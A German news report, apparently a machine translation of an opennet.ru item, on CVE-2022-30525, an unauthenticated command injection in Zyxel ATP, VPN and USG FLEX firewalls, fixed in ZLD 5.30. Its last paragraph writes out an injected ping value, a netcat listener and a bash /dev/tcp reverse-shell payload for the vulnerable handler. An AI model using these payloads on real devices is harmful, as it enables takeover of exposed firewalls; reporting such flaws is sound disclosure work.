Sicherheitslücke in Zyxel-Firewalls, die die Codeausführung ohne Authentifizierung ermöglicht

In Zyxel-Geräten der Serien ATP, VPN und USG FLEX wurde eine kritische Schwachstelle (CVE-2022-30525) identifiziert, die den Betrieb von Firewalls, IDS und VPN in Unternehmen organisieren soll und es einem externen Angreifer ermöglicht, Code darauf auszuführen Gerät ohne Benutzerrechte ohne Authentifizierung. Um einen Angriff durchzuführen, muss ein Angreifer in der Lage sein, über das HTTP/HTTPS-Protokoll Anfragen an das Gerät zu senden. Zyxel hat die Schwachstelle im Firmware-Update ZLD 5.30 behoben. Nach Angaben des Shodan-Dienstes gibt es derzeit 16213 potenziell anfällige Geräte im globalen Netzwerk, die Anfragen über HTTP/HTTPS akzeptieren.

Der Vorgang erfolgt durch Senden speziell entwickelter Befehle an den Web-Handler /ztp/cgi-bin/handler, auf den ohne Authentifizierung zugegriffen werden kann. Das Problem wird dadurch verursacht, dass die Anforderungsparameter nicht ordnungsgemäß bereinigt werden, wenn Befehle auf dem System mithilfe des os.system-Aufrufs ausgeführt werden, der in der Bibliothek lib_wan_settings.py verwendet und bei der Verarbeitung der setWanPortSt-Operation ausgeführt wird.

Beispielsweise könnte ein Angreifer die Zeichenfolge „; ping 192.168.1.210;" Dies führt zur Ausführung des Befehls „ping 192.168.1.210“ auf dem System. Um Zugriff auf die Befehlsshell zu erhalten, können Sie „nc -lvnp 1270“ auf Ihrem System ausführen und dann eine umgekehrte Verbindung initiieren, indem Sie eine Anfrage mit dem Befehl „;“ an das Gerät senden. bash -c \»exec bash -i &>/dev/tcp/192.168.1.210/1270 <&1;\»;'.

Source: opennet.ru

Kommentar hinzufügen